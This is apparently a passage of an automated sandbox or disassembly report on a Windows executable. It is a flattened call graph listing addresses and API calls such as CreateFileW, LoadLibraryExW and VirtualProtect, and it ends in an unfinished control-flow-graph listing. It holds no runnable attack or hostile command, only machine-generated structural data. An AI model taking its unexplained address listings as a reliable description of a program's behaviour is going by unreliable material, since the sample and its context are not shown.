77508->77515 77730 7ff6448790c0 LocalFree 77509->77730 77728 7ff644878940 40 API calls __std_exception_destroy 77511->77728 77515->77544 77721 7ff644876dc0 54 API calls memcpy_s 77515->77721 77520 7ff644874047 77732 7ff644876fc0 FreeLibrary 77520->77732 77523 7ff644874053 77526 7ff644873e64 77722 7ff644877340 117 API calls 2 library calls 77526->77722 77531 7ff644873e79 77533 7ff644873e9a 77531->77533 77545 7ff644873e7d 77531->77545 77723 7ff644876e00 120 API calls _log10_special 77531->77723 77533->77545 77724 7ff6448771b0 125 API calls 77533->77724 77537 7ff644873eaf 77537->77545 77725 7ff6448774f0 55 API calls 77537->77725 77539 7ff644873ed8 77727 7ff644876fc0 FreeLibrary 77539->77727 77544->77501 77544->77503 77545->77544 77726 7ff644872a50 54 API calls _log10_special 77545->77726 77554->77395 77555 7ff64487d2b8 GetModuleHandleW 77555->77403 77556->77405 77557->77391 77558->77394 77559->77409 77561 7ff64489a4c0 77560->77561 77561->77414 77561->77561 77563 7ff64488f480 77562->77563 77565 7ff64488f526 77563->77565 77566 7ff64488f4d3 77563->77566 77734 7ff64488f358 71 API calls _fread_nolock 77565->77734 77733 7ff64488a814 37 API calls 2 library calls 77566->77733 77568 7ff64488f4fc 77568->77418 77735 7ff64487c850 77569->77735 77572 7ff6448736eb GetLastError 77742 7ff644872c50 51 API calls _log10_special 77572->77742 77573 7ff644873710 77737 7ff644879280 FindFirstFileExW 77573->77737 77577 7ff64487377d 77745 7ff644879440 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 77577->77745 77578 7ff644873723 77743 7ff644879300 CreateFileW GetFinalPathNameByHandleW CloseHandle 77578->77743 77580 7ff64487c550 _log10_special 8 API calls 77583 7ff6448737b5 77580->77583 77582 7ff644873730 77585 7ff64487374c __vcrt_FlsAlloc 77582->77585 77586 7ff644873734 77582->77586 77583->77463 77591 7ff644871950 77583->77591 77584 7ff64487378b 77587 7ff644873706 77584->77587 77746 7ff644872810 49 API calls _log10_special 77584->77746 77585->77577 77744 7ff644872810 49 API calls _log10_special 77586->77744 77587->77580 77590 7ff644873745 77590->77587 77592 7ff6448745c0 108 API calls 77591->77592 77593 7ff644871985 77592->77593 77594 7ff644871c43 77593->77594 77596 7ff644877f90 83 API calls 77593->77596 77595 7ff64487c550 _log10_special 8 API calls 77594->77595 77597 7ff644871c5e 77595->77597 77598 7ff6448719cb 77596->77598 77597->77425 77597->77426 77640 7ff644871a03 77598->77640 77747 7ff6448806d4 77598->77747 77599 7ff64488004c 74 API calls 77599->77594 77601 7ff6448719e5 77602 7ff644871a08 77601->77602 77603 7ff6448719e9 77601->77603 77751 7ff64488039c 77602->77751 77754 7ff644884f08 11 API calls memcpy_s 77603->77754 77606 7ff6448719ee 77755 7ff644872910 54 API calls _log10_special 77606->77755 77609 7ff644871a26 77756 7ff644884f08 11 API calls memcpy_s 77609->77756 77610 7ff644871a45 77613 7ff644871a5c 77610->77613 77614 7ff644871a7b 77610->77614 77612 7ff644871a2b 77757 7ff644872910 54 API calls _log10_special 77612->77757 77758 7ff644884f08 11 API calls memcpy_s 77613->77758 77617 7ff644871c80 49 API calls 77614->77617 77619 7ff644871a92 77617->77619 77618 7ff644871a61 77759 7ff644872910 54 API calls _log10_special 77618->77759 77621 7ff644871c80 49 API calls 77619->77621 77622 7ff644871add 77621->77622 77623 7ff6448806d4 73 API calls 77622->77623 77624 7ff644871b01 77623->77624 77625 7ff644871b16 77624->77625 77626 7ff644871b35 77624->77626 77760 7ff644884f08 11 API calls memcpy_s 77625->77760 77627 7ff64488039c _fread_nolock 53 API calls 77626->77627 77630 7ff644871b4a 77627->77630 77629 7ff644871b1b 77761 7ff644872910 54 API calls _log10_special 77629->77761 77632 7ff644871b50 77630->77632 77633 7ff644871b6f 77630->77633 77762 7ff644884f08 11 API calls memcpy_s 77632->77762 77764 7ff644880110 37 API calls 2 library calls 77633->77764 77636 7ff644871b55 77763 7ff644872910 54 API calls _log10_special 77636->77763 77637 7ff644871b89 77637->77640 77765 7ff644872710 54 API calls _log10_special 77637->77765 77640->77599 77642 7ff64487883a 77641->77642 77643 7ff644879390 2 API calls 77642->77643 77644 7ff644878859 GetEnvironmentVariableW 77643->77644 77645 7ff644878876 ExpandEnvironmentStringsW 77644->77645 77646 7ff6448788c2 77644->77646 77645->77646 77647 7ff644878898 77645->77647 77648 7ff64487c550 _log10_special 8 API calls 77646->77648 77795 7ff644879440 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 77647->77795 77650 7ff6448788d4 77648->77650 77650->77435 77651 7ff6448788aa 77652 7ff64487c550 _log10_special 8 API calls 77651->77652 77653 7ff6448788ba 77652->77653 77653->77435 77655 7ff6448793b2 MultiByteToWideChar 77654->77655 77657 7ff6448793d6 77654->77657 77655->77657 77658 7ff6448793ec __std_exception_destroy 77655->77658 77656 7ff6448793f3 MultiByteToWideChar 77656->77658 77657->77656 77657->77658 77658->77495 77796 7ff644876360 77659->77796 77662 7ff644873399 77731 7ff644873670 FreeLibrary 77662->77731 77664 7ff644873381 77664->77662 77864 7ff644876050 77664->77864 77666 7ff64487338d 77666->77662 77873 7ff6448761e0 54 API calls 77666->77873 77669 7ff644871ca5 77668->77669 78012 7ff644884984 77669->78012 77672->77442 77674 7ff6448745cc 77673->77674 77675 7ff644879390 2 API calls 77674->77675 77676 7ff6448745f4 77675->77676 77677 7ff644879390 2 API calls 77676->77677 77678 7ff644874607 77677->77678 78039 7ff644885f94 77678->78039 77681 7ff64487c550 _log10_special 8 API calls 77682 7ff64487392b 77681->77682 77682->77431 77683 7ff644877f90 77682->77683 77684 7ff644877fb4 77683->77684 77685 7ff64487808b __std_exception_destroy 77684->77685 77686 7ff6448806d4 73 API calls 77684->77686 77685->77436 77687 7ff644877fd0 77686->77687 77687->77685 78207 7ff6448878c8 77687->78207 77689 7ff6448806d4 73 API calls 77690 7ff644877fe5 77689->77690 77690->77685 77690->77689 77691 7ff64488039c _fread_nolock 53 API calls 77690->77691 77691->77690 77693 7ff64488007c 77692->77693 78223 7ff64487fe28 77693->78223 77695 7ff644880095 77695->77431 77696->77463 77697->77463 77698->77446 77699->77449 77700->77455 77701->77457 77702->77472 77703->77463 77704->77476 77705->77463 77707 7ff64487c559 77706->77707 77708 7ff644873ca7 77707->77708 77709 7ff64487c8e0 IsProcessorFeaturePresent 77707->77709 77708->77555 77710 7ff64487c8f8 77709->77710 78235 7ff64487cad8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 77710->78235 77712 7ff64487c90b 78236 7ff64487c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 77712->78236 77715->77486 77716->77463 77717->77475 77719 7ff644871c80 49 API calls 77718->77719 77720 7ff644874660 77719->77720 77720->77496 77721->77526 77722->77531 77723->77533 77724->77537 77725->77545 77726->77539 77727->77544 77728->77544 77729->77507 77731->77520 77732->77523 77733->77568 77734->77568 77736 7ff6448736bc GetModuleFileNameW 77735->77736 77736->77572 77736->77573 77738 7ff6448792d2 77737->77738 77739 7ff6448792bf FindClose 77737->77739 77740 7ff64487c550 _log10_special 8 API calls 77738->77740 77739->77738 77741 7ff64487371a 77740->77741 77741->77577 77741->77578 77742->77587 77743->77582 77744->77590 77745->77584 77746->77587 77748 7ff644880704 77747->77748 77766 7ff644880464 77748->77766 77750 7ff64488071d 77750->77601 77779 7ff6448803bc 77751->77779 77754->77606 77755->77640 77756->77612 77757->77640 77758->77618 77759->77640 77760->77629 77761->77640 77762->77636 77763->77640 77764->77637 77765->77640 77767 7ff6448804ce 77766->77767 77768 7ff64488048e 77766->77768 77767->77768 77770 7ff6448804da 77767->77770 77778 7ff64488a814 37 API calls 2 library calls 77768->77778 77777 7ff64488546c EnterCriticalSection 77770->77777 77771 7ff6448804b5 77771->77750 77773 7ff6448804df 77774 7ff6448805e8 71 API calls 77773->77774 77775 7ff6448804f1 77774->77775 77776 7ff644885478 _fread_nolock LeaveCriticalSection 77775->77776 77776->77771 77778->77771 77780 7ff6448803e6 77779->77780 77781 7ff644871a20 77779->77781 77780->77781 77782 7ff6448803f5 memcpy_s 77780->77782 77783 7ff644880432 77780->77783 77781->77609 77781->77610 77793 7ff644884f08 11 API calls memcpy_s 77782->77793 77792 7ff64488546c EnterCriticalSection 77783->77792 77785 7ff64488043a 77787 7ff64488013c _fread_nolock 51 API calls 77785->77787 77789 7ff644880451 77787->77789 77788 7ff64488040a 77794 7ff64488a8e0 37 API calls _invalid_parameter_noinfo 77788->77794 77791 7ff644885478 _fread_nolock LeaveCriticalSection 77789->77791 77791->77781 77793->77788 77794->77781 77795->77651 77797 7ff644876375 77796->77797 77798 7ff644871c80 49 API calls 77797->77798 77799 7ff6448763b1 77798->77799 77800 7ff6448763dd 77799->77800 77801 7ff6448763ba 77799->77801 77803 7ff644874630 49 API calls 77800->77803 77884 7ff644872710 54 API calls _log10_special 77801->77884 77804 7ff6448763f5 77803->77804 77805 7ff644876413 77804->77805 77885 7ff644872710 54 API calls _log10_special 77804->77885 77874 7ff644874560 77805->77874 77808 7ff64487c550 _log10_special 8 API calls 77810 7ff64487336e 77808->77810 77810->77662 77827 7ff644876500 77810->77827 77811 7ff64487642b 77813 7ff644874630 49 API calls 77811->77813 77812 7ff644878e80 3 API calls 77812->77811 77814 7ff644876444 77813->77814 77815 7ff644876469 77814->77815 77816 7ff644876449 77814->77816 77880 7ff644878e80 77815->77880 77886 7ff644872710 54 API calls _log10_special 77816->77886 77819 7ff644876476 77821 7ff644876482 77819->77821 77822 7ff6448764c1 77819->77822 77820 7ff6448763d3 77820->77808 77823 7ff644879390 2 API calls 77821->77823 77888 7ff644875830 137 API calls 77822->77888 77825 7ff64487649a GetLastError 77823->77825 77887 7ff644872c50 51 API calls _log10_special 77825->77887 77889 7ff644875400 77827->77889 77829 7ff644876526 77830 7ff64487652e 77829->77830 77831 7ff64487653f 77829->77831 77914 7ff644872710 54 API calls _log10_special 77830->77914 77896 7ff644874c90 77831->77896 77835 7ff64487655c 77838 7ff64487656c 77835->77838 77841 7ff64487657d 77835->77841 77836 7ff64487654b 77915 7ff644872710 54 API calls _log10_special 77836->77915 77916 7ff644872710 54 API calls _log10_special 77838->77916 77839 7ff64487653a 77839->77664 77842 7ff64487659c 77841->77842 77843 7ff6448765ad 77841->77843 77917 7ff644872710 54 API calls _log10_special 77842->77917 77845 7ff6448765bc 77843->77845 77846 7ff6448765cd 77843->77846 77918 7ff644872710 54 API calls _log10_special 77845->77918 77900 7ff644874d50 77846->77900 77850 7ff6448765dc 77919 7ff644872710 54 API calls _log10_special 77850->77919 77851 7ff6448765ed 77853 7ff6448765fc 77851->77853 77854 7ff64487660d 77851->77854 77920 7ff644872710 54 API calls _log10_special 77853->77920 77856 7ff644876630 77854->77856 77857 7ff64487661f 77854->77857 77859 7ff64487665a 77856->77859 77922 7ff6448872b0 73 API calls 77856->77922 77921 7ff644872710 54 API calls _log10_special 77857->77921 77859->77839 77924 7ff644872710 54 API calls _log10_special 77859->77924 77861 7ff644876648 77923 7ff6448872b0 73 API calls 77861->77923 77865 7ff644876070 77864->77865 77865->77865 77866 7ff644876099 77865->77866 77871 7ff6448760b0 __std_exception_destroy 77865->77871 77956 7ff644872710 54 API calls _log10_special 77866->77956 77868 7ff6448760a5 77868->77666 77869 7ff6448761bb 77869->77666 77871->77869 77872 7ff644872710 54 API calls 77871->77872 77926 7ff644871470 77871->77926 77872->77871 77873->77662 77875 7ff64487456a 77874->77875 77876 7ff644879390 2 API calls 77875->77876 77877 7ff64487458f 77876->77877 77878 7ff64487c550 _log10_special 8 API calls 77877->77878 77879 7ff6448745b7 77878->77879 77879->77811 77879->77812 77881 7ff644879390 2 API calls 77880->77881 77882 7ff644878e94 LoadLibraryExW 77881->77882 77883 7ff644878eb3 __std_exception_destroy 77882->77883 77883->77819 77884->77820 77885->77805 77886->77820 77887->77820 77888->77820 77891 7ff64487542c 77889->77891 77890 7ff644875434 77890->77829 77891->77890 77894 7ff6448755d4 77891->77894 77925 7ff644886aa4 48 API calls 77891->77925 77892 7ff644875797 __std_exception_destroy 77892->77829 77893 7ff6448747d0 47 API calls 77893->77894 77894->77892 77894->77893 77897 7ff644874cc0 77896->77897 77898 7ff64487c550 _log10_special 8 API calls 77897->77898 77899 7ff644874d2a 77898->77899 77899->77835 77899->77836 77901 7ff644874d65 77900->77901 77902 7ff644871c80 49 API calls 77901->77902 77903 7ff644874db1 77902->77903 77904 7ff644871c80 49 API calls 77903->77904 77913 7ff644874e33 __std_exception_destroy 77903->77913 77905 7ff644874df0 77904->77905 77908 7ff644879390 2 API calls 77905->77908 77905->77913 77906 7ff64487c550 _log10_special 8 API calls 77907 7ff644874e7e 77906->77907 77907->77850 77907->77851 77909 7ff644874e06 77908->77909 77910 7ff644879390 2 API calls 77909->77910 77911 7ff644874e1d 77910->77911 77912 7ff644879390 2 API calls 77911->77912 77912->77913 77913->77906 77914->77839 77915->77839 77916->77839 77917->77839 77918->77839 77919->77839 77920->77839 77921->77839 77922->77861 77923->77859 77924->77839 77925->77891 77927 7ff6448745c0 108 API calls 77926->77927 77928 7ff644871493 77927->77928 77929 7ff6448714bc 77928->77929 77930 7ff64487149b 77928->77930 77931 7ff6448806d4 73 API calls 77929->77931 77979 7ff644872710 54 API calls _log10_special 77930->77979 77933 7ff6448714d1 77931->77933 77935 7ff6448714f8 77933->77935 77936 7ff6448714d5 77933->77936 77934 7ff6448714ab 77934->77871 77940 7ff644871508 77935->77940 77941 7ff644871532 77935->77941 77980 7ff644884f08 11 API calls memcpy_s 77936->77980 77938 7ff6448714da 77981 7ff644872910 54 API calls _log10_special 77938->77981 77982 7ff644884f08 11 API calls memcpy_s 77940->77982 77942 7ff644871538 77941->77942 77951 7ff64487154b 77941->77951 77957 7ff644871210 77942->77957 77945 7ff644871510 77983 7ff644872910 54 API calls _log10_special 77945->77983 77946 7ff64488004c 74 API calls 77949 7ff6448715c4 77946->77949 77947 7ff6448714f3 __std_exception_destroy 77947->77946 77949->77871 77950 7ff64488039c _fread_nolock 53 API calls 77950->77951 77951->77947 77951->77950 77952 7ff6448715d6 77951->77952 77984 7ff644884f08 11 API calls memcpy_s 77952->77984 77954 7ff6448715db 77985 7ff644872910 54 API calls _log10_special 77954->77985 77956->77868 77958 7ff644871268 77957->77958 77959 7ff644871297 77958->77959 77960 7ff64487126f 77958->77960 77963 7ff6448712d4 77959->77963 77964 7ff6448712b1 77959->77964 77990 7ff644872710 54 API calls _log10_special 77960->77990 77962 7ff644871282 77962->77947 77968 7ff6448712e6 77963->77968 77978 7ff644871309 memcpy_s 77963->77978 77991 7ff644884f08 11 API calls memcpy_s 77964->77991 77966 7ff6448712b6 77992 7ff644872910 54 API calls _log10_special 77966->77992 77993 7ff644884f08 11 API calls memcpy_s 77968->77993 77970 7ff6448712eb 77994 7ff644872910 54 API calls _log10_special 77970->77994 77971 7ff64488039c _fread_nolock 53 API calls 77971->77978 77973 7ff644880110 37 API calls 77973->77978 77974 7ff6448712cf __std_exception_destroy 77974->77947 77975 7ff6448713cf 77995 7ff644872710 54 API calls _log10_special 77975->77995 77978->77971 77978->77973 77978->77974 77978->77975 77986 7ff644880adc 77978->77986 77979->77934 77980->77938 77981->77947 77982->77945 77983->77947 77984->77954 77985->77947 77987 7ff644880b0c 77986->77987 77996 7ff64488082c 77987->77996 77989 7ff644880b2a 77989->77978 77990->77962 77991->77966 77992->77974 77993->77970 77994->77974 77995->77974 77997 7ff64488084c 77996->77997 77998 7ff644880879 77996->77998 77997->77998 77999 7ff644880856 77997->77999 78000 7ff644880881 77997->78000 77998->77989 78010 7ff64488a814 37 API calls 2 library calls 77999->78010 78003 7ff64488076c 78000->78003 78011 7ff64488546c EnterCriticalSection 78003->78011 78005 7ff644880789 78006 7ff6448807ac 74 API calls 78005->78006 78007 7ff644880792 78006->78007 78008 7ff644885478 _fread_nolock LeaveCriticalSection 78007->78008 78009 7ff64488079d 78008->78009 78009->77998 78010->77998 78015 7ff6448849de 78012->78015 78013 7ff644884a03 78030 7ff64488a814 37 API calls 2 library calls 78013->78030 78015->78013 78016 7ff644884a3f 78015->78016 78031 7ff644882c10 49 API calls _invalid_parameter_noinfo 78016->78031 78018 7ff644884a2d 78020 7ff64487c550 _log10_special 8 API calls 78018->78020 78019 7ff644884ae8 78027 7ff644884b1c 78019->78027 78029 7ff644884af1 78019->78029 78023 7ff644871cc8 78020->78023 78021 7ff64488a948 __free_lconv_mon 11 API calls 78021->78018 78022 7ff644884ad6 78022->78019 78024 7ff644884b40 78022->78024 78022->78027 78022->78029 78023->77430 78025 7ff644884b4a 78024->78025 78024->78027 78028 7ff64488a948 __free_lconv_mon 11 API calls 78025->78028 78027->78021 78028->78018 78032 7ff64488a948 78029->78032 78030->78018 78031->78022 78033 7ff64488a97c 78032->78033 78034 7ff64488a94d RtlFreeHeap 78032->78034 78033->78018 78034->78033 78035 7ff64488a968 GetLastError 78034->78035 78036 7ff64488a975 __free_lconv_mon 78035->78036 78038 7ff644884f08 11 API calls memcpy_s 78036->78038 78038->78033 78040 7ff644885ec8 78039->78040 78041 7ff644885eee 78040->78041 78044 7ff644885f21 78040->78044 78070 7ff644884f08 11 API calls memcpy_s 78041->78070 78043 7ff644885ef3 78071 7ff64488a8e0 37 API calls _invalid_parameter_noinfo 78043->78071 78046 7ff644885f27 78044->78046 78047 7ff644885f34 78044->78047 78072 7ff644884f08 11 API calls memcpy_s 78046->78072 78058 7ff64488ac28 78047->78058 78051 7ff644885f48 78073 7ff644884f08 11 API calls memcpy_s 78051->78073 78052 7ff644885f55 78065 7ff64488fecc 78052->78065 78055 7ff644885f68 78074 7ff644885478 LeaveCriticalSection 78055->78074 78057 7ff644874616 78057->77681 78075 7ff6448902d8 EnterCriticalSection 78058->78075 78060 7ff64488ac3f 78061 7ff64488ac9c 19 API calls 78060->78061 78062 7ff64488ac4a 78061->78062 78063 7ff644890338 _isindst LeaveCriticalSection 78062->78063 78064 7ff644885f3e 78063->78064 78064->78051 78064->78052 78076 7ff64488fbc8 78065->78076 78068 7ff64488ff26 78068->78055 78070->78043 78071->78057 78072->78057 78073->78057 78081 7ff64488fc03 __vcrt_FlsAlloc 78076->78081 78078 7ff64488fea1 78095 7ff64488a8e0 37 API calls _invalid_parameter_noinfo 78078->78095 78080 7ff64488fdd3 78080->78068 78088 7ff644896d54 78080->78088 78086 7ff64488fdca 78081->78086 78091 7ff644887a3c 51 API calls 3 library calls 78081->78091 78083 7ff64488fe35 78083->78086 78092 7ff644887a3c 51 API calls 3 library calls 78083->78092 78085 7ff64488fe54 78085->78086 78093 7ff644887a3c 51 API calls 3 library calls 78085->78093 78086->78080 78094 7ff644884f08 11 API calls memcpy_s 78086->78094 78096 7ff644896354 78088->78096 78091->78083 78092->78085 78093->78086 78094->78078 78095->78080 78097 7ff644896389 78096->78097 78098 7ff64489636b 78096->78098 78097->78098 78101 7ff6448963a5 78097->78101 78150 7ff644884f08 11 API calls memcpy_s 78098->78150 78100 7ff644896370 78151 7ff64488a8e0 37 API calls _invalid_parameter_noinfo 78100->78151 78107 7ff644896964 78101->78107 78105 7ff64489637c 78105->78068 78153 7ff644896698 78107->78153 78110 7ff6448969f1 78173 7ff644888520 78110->78173 78111 7ff6448969d9 78185 7ff644884ee8 11 API calls memcpy_s 78111->78185 78123 7ff6448963d0 78123->78105 78152 7ff6448884f8 LeaveCriticalSection 78123->78152 78131 7ff6448969de 78186 7ff644884f08 11 API calls memcpy_s 78131->78186 78150->78100 78151->78105 78154 7ff6448966c4 78153->78154 78155 7ff6448966de 78153->78155 78154->78155 78198 7ff644884f08 11 API calls memcpy_s 78154->78198 78158 7ff64489675c 78155->78158 78200 7ff644884f08 11 API calls memcpy_s 78155->78200 78157 7ff6448966d3 78199 7ff64488a8e0 37 API calls _invalid_parameter_noinfo 78157->78199 78160 7ff6448967ad 78158->78160 78202 7ff644884f08 11 API calls memcpy_s 78158->78202 78171 7ff64489680a 78160->78171 78204 7ff644889b78 37 API calls 2 library calls 78160->78204 78163 7ff644896806 78166 7ff644896888 78163->78166 78163->78171 78165 7ff6448967a2 78203 7ff64488a8e0 37 API calls _invalid_parameter_noinfo 78165->78203 78205 7ff64488a900 17 API calls _CallSETranslator 78166->78205 78167 7ff644896751 78201 7ff64488a8e0 37 API calls _invalid_parameter_noinfo 78167->78201 78171->78110 78171->78111 78206 7ff6448902d8 EnterCriticalSection 78173->78206 78185->78131 78186->78123 78198->78157 78199->78155 78200->78167 78201->78158 78202->78165 78203->78160 78204->78163 78208 7ff6448878f8 78207->78208 78211 7ff6448873d4 78208->78211 78210 7ff644887911 78210->77690 78212 7ff6448873ef 78211->78212 78213 7ff64488741e 78211->78213 78222 7ff64488a814 37 API calls 2 library calls 78212->78222 78221 7ff64488546c EnterCriticalSection 78213->78221 78216 7ff64488740f 78216->78210 78217 7ff644887423 78218 7ff644887440 38 API calls 78217->78218 78219 7ff64488742f 78218->78219 78220 7ff644885478 _fread_nolock LeaveCriticalSection 78219->78220 78220->78216 78222->78216 78224 7ff64487fe43 78223->78224 78225 7ff64487fe71 78223->78225 78234 7ff64488a814 37 API calls 2 library calls 78224->78234 78228 7ff64487fe63 78225->78228 78233 7ff64488546c EnterCriticalSection 78225->78233 78228->77695 78229 7ff64487fe88 78230 7ff64487fea4 72 API calls 78229->78230 78231 7ff64487fe94 78230->78231 78232 7ff644885478 _fread_nolock LeaveCriticalSection 78231->78232 78232->78228 78234->78228 78235->77712 77274 7ff644885628 77275 7ff644885642 77274->77275 77276 7ff64488565f 77274->77276 77299 7ff644884ee8 11 API calls memcpy_s 77275->77299 77276->77275 77277 7ff644885672 CreateFileW 77276->77277 77279 7ff6448856dc 77277->77279 77280 7ff6448856a6 77277->77280 77303 7ff644885c04 46 API calls 3 library calls 77279->77303 77302 7ff64488577c 59 API calls 3 library calls 77280->77302 77281 7ff644885647 77300 7ff644884f08 11 API calls memcpy_s 77281->77300 77285 7ff6448856b4 77288 7ff6448856bb CloseHandle 77285->77288 77289 7ff6448856d1 CloseHandle 77285->77289 77286 7ff6448856e1 77290 7ff6448856e5 77286->77290 77291 7ff644885710 77286->77291 77287 7ff64488564f 77301 7ff64488a8e0 37 API calls _invalid_parameter_noinfo 77287->77301 77294 7ff64488565a 77288->77294 77289->77294 77304 7ff644884e7c 11 API calls 2 library calls 77290->77304 77305 7ff6448859c4 51 API calls 77291->77305 77296 7ff64488571d 77306 7ff644885b00 21 API calls _fread_nolock 77296->77306 77298 7ff6448856ef 77298->77294 77299->77281 77300->77287 77301->77294 77302->77285 77303->77286 77304->77298 77305->77296 77306->77298 77307 7ffdfaf55340 77308 7ffdfaf553ce 77307->77308 77310 7ffdfaf55378 77307->77310 77309 7ffdfaf553f0 77308->77309 77308->77310 77312 7ffdfaf55390 77309->77312 77317 7ffdfaf553f5 77309->77317 77319 7ffdfaed9330 9 API calls 77310->77319 77320 7ffdfaed9330 9 API calls 77312->77320 77314 7ffdfaf553ba 77315 7ffdfaf54d90 40 API calls 77315->77317 77316 7ffdfaf554ed 77317->77315 77317->77316 77321 7ffdfaf3b0f0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 77317->77321 77319->77312 77320->77314 77321->77317 77322 7ffdff1afae0 77323 7ffdff1afaf0 77322->77323 77324 7ffdff1afb00 77323->77324 77327 7ffdff1914bf 77323->77327 77331 7ffdff191df2 77323->77331 77327->77324 77328 7ffdff1edf00 77327->77328 77329 7ffdff1ee73f SetLastError 77328->77329 77330 7ffdff1ee753 77328->77330 77329->77330 77330->77324 77331->77324 77332 7ffdff1ee020 77331->77332 77333 7ffdff1ee73f SetLastError 77332->77333 77334 7ffdff1ee753 77332->77334 77333->77334 77334->77324 77335 7ffdff1a7980 77336 7ffdff1a79a4 77335->77336 77337 7ffdff1a83b4 00007FFE1FFB6570 77336->77337 77338 7ffdff1a7a79 77336->77338 77337->77338 78237 7ffdfae9f160 78238 7ffdfae9f178 78237->78238 78239 7ffdfae9fd01 78237->78239 78240 7ffdfae9fc0e LoadLibraryA 78238->78240 78243 7ffdfae9fc69 VirtualProtect VirtualProtect 78238->78243 78241 7ffdfae9fc28 78240->78241 78241->78238 78244 7ffdfae9fc47 GetProcAddress 78241->78244 78243->78239 78244->78241 78245 7ffdfae9fc5e 78244->78245 78246 7ffdff19ee30 78247 7ffdff191325 78246->78247 78248 7ffdff19ee50 SetLastError 78247->78248 78249 7ffdff19ee70 78248->78249 78250 7ff644872fe0 78251 7ff644872ff0 78250->78251 78252 7ff64487302b 78251->78252 78253 7ff644873041 78251->78253 78278 7ff644872710 54 API calls _log10_special 78252->78278 78256 7ff644873061 78253->78256 78260 7ff644873077 __std_exception_destroy 78253->78260 78255 7ff644873037 __std_exception_destroy 78258 7ff64487c550 _log10_special 8 API calls 78255->78258 78279 7ff644872710 54 API calls _log10_special 78256->78279 78259 7ff6448731fa 78258->78259 78260->78255 78261 7ff644871470 116 API calls 78260->78261 78262 7ff644873349 78260->78262 78264 7ff644871c80 49 API calls 78260->78264 78265 7ff644873333 78260->78265 78267 7ff64487330d 78260->78267 78269 7ff644873207 78260->78269 78261->78260 78286 7ff644872710 54 API calls _log10_special 78262->78286 78264->78260 78285 7ff644872710 54 API calls _log10_special 78265->78285 78284 7ff644872710 54 API calls _log10_special 78267->78284 78270 7ff644873273 78269->78270 78280 7ff64488a404 37 API calls 2 library calls 78269->78280 78272 7ff644873290 78270->78272 78273 7ff64487329e 78270->78273 78281 7ff64488a404 37 API calls 2 library calls 78272->78281 78282 7ff644872dd0 37 API calls 78273->78282 78276 7ff64487329c 78283 7ff644872500 54 API calls __std_exception_destroy 78276->78283 78278->78255 78279->78255 78280->78270 78281->78276 78282->78276 78283->78255 78284->78255 78285->78255 78286->78255 77339 7ffdfaef2210 77343 7ffdfaef225b new[] 77339->77343 77340 7ffdfb002bc0 4 API calls 77341 7ffdfaef23ac 77340->77341 77344 7ffdfaef23c9 00007FFE148D2010 77343->77344 77347 7ffdfaef23d4 new[] 77343->77347 77349 7ffdfaef238f 77343->77349 77344->77347 77345 7ffdfaef2628 77348 7ffdfaef26ac 77345->77348 77350 7ffdfaedd970 16 API calls 77345->77350 77347->77348 77347->77349 77351 7ffdfaee9260 77347->77351 77348->77349 77365 7ffdfaee89c0 26 API calls 77348->77365 77349->77340 77350->77348 77352 7ffdfaee92e5 77351->77352 77353 7ffdfaee943d new[] 77351->77353 77352->77353 77354 7ffdfaee92fe new[] 77352->77354 77355 7ffdfaee9340 new[] 77353->77355 77363 7ffdfaee9572 77353->77363 77379 7ffdfaf95c70 9 API calls 77353->77379 77357 7ffdfaee9325 00007FFE148D2010 77354->77357 77354->77363 77356 7ffdfaee9405 00007FFE148D2010 77355->77356 77361 7ffdfaee9629 77355->77361 77355->77363 77358 7ffdfaee95db 77356->77358 77359 7ffdfaee9427 00007FFE148D2010 77356->77359 77357->77355 77360 7ffdfaee95de 00007FFE148D2010 00007FFE148D2010 77358->77360 77359->77360 77360->77361 77361->77363 77366 7ffdfaedff80 77361->77366 77363->77345 77365->77349 77373 7ffdfaedffd1 77366->77373 77368 7ffdfb002bc0 4 API calls 77369 7ffdfaee05f7 77368->77369 77369->77363 77370 7ffdfaee01a0 CreateFileW 77370->77373 77373->77370 77374 7ffdfaee0425 77373->77374 77377 7ffdfaee0358 77373->77377 77380 7ffdfaedf9a0 15 API calls new[] 77373->77380 77381 7ffdfaee07b0 13 API calls 77373->77381 77382 7ffdfaed9330 9 API calls 77373->77382 77383 7ffdfaedd7a0 13 API calls 77374->77383 77376 7ffdfaee0450 77384 7ffdfaf95c70 9 API calls 77376->77384 77377->77368 77379->77355 77380->77373 77381->77373 77382->77373 77383->77376 77384->77377 78296 7ffdfaee11e0 GetSystemInfo 78297 7ffdfaee1214 78296->78297

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 0 7ff644871000-7ff644873806 call 7ff64487fe18 call 7ff64487fe20 call 7ff64487c850 call 7ff6448853f0 call 7ff644885484 call 7ff6448736b0 14 7ff644873808-7ff64487380f 0->14 15 7ff644873814-7ff644873836 call 7ff644871950 0->15 16 7ff644873c97-7ff644873cb2 call 7ff64487c550 14->16 21 7ff64487383c-7ff644873856 call 7ff644871c80 15->21 22 7ff64487391b-7ff644873931 call 7ff6448745c0 15->22 26 7ff64487385b-7ff64487389b call 7ff644878830 21->26 27 7ff64487396a-7ff64487397f call 7ff644872710 22->27 28 7ff644873933-7ff644873960 call 7ff644877f90 22->28 35 7ff64487389d-7ff6448738a3 26->35 36 7ff6448738c1-7ff6448738cc call 7ff644884f30 26->36 40 7ff644873c8f 27->40 38 7ff644873984-7ff6448739a6 call 7ff644871c80 28->38 39 7ff644873962-7ff644873965 call 7ff64488004c 28->39 41 7ff6448738a5-7ff6448738ad 35->41 42 7ff6448738af-7ff6448738bd call 7ff6448789a0 35->42 48 7ff6448739fc-7ff644873a2a call 7ff644878940 call 7ff6448789a0 * 3 36->48 49 7ff6448738d2-7ff6448738e1 call 7ff644878830 36->49 53 7ff6448739b0-7ff6448739b9 38->53 39->27 40->16 41->42 42->36 76 7ff644873a2f-7ff644873a3e call 7ff644878830 48->76 57 7ff6448738e7-7ff6448738ed 49->57 58 7ff6448739f4-7ff6448739f7 call 7ff644884f30 49->58 53->53 56 7ff6448739bb-7ff6448739d8 call 7ff644871950 53->56 56->26 65 7ff6448739de-7ff6448739ef call 7ff644872710 56->65 62 7ff6448738f0-7ff6448738fc 57->62 58->48 66 7ff644873905-7ff644873908 62->66 67 7ff6448738fe-7ff644873903 62->67 65->40 66->58 70 